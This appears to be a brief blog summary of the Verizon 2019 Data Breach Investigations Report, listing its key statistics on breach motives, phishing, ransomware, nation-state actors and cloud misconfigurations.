The DBIR has evolved since its initial release in 2008, when it was payment card data breach and Verizon breach investigations data focused. This year’s DBIR involved the analysis of 41,686 security incidents from 66 global data sources in addition to Verizon. The analysed findings are expertly presented over 77 pages, using simple charts supported by ‘plain English’ astute explanations, reason why then, the DBIR is one of the most quoted reports in presentations and within industry sales collateral.

DBIR 2019 Key Takeaways
      • Financial gain remains the most common motivate behind data breaches (71%)
      • 43% of breaches occurred at small businesses
      • A third (32%) of breaches involved phishing
      • The nation-state threat is increasing, with 23% of breaches by nation-state actors
      • More than half (56%) of data breaches took months or longer to discover
      • Ransomware remains a major threat, and is the second most common type of malware reported
      • Business executives are increasingly targeted with social engineering, attacks such as phishing\BEC
      • Crypto-mining malware accounts for less than 5% of data breaches, despite the publicity it didn’t make the top ten malware listed in the report
      • Espionage is a key motivation behind a quarter of data breaches
      • 60 million records breached due to misconfigured cloud service buckets
      • Continued reduction in payment card point of sale breaches
      • The hacktivist threat remains low, the increase of hacktivist attacks report in DBIR 2012 report appears to be a one-off spike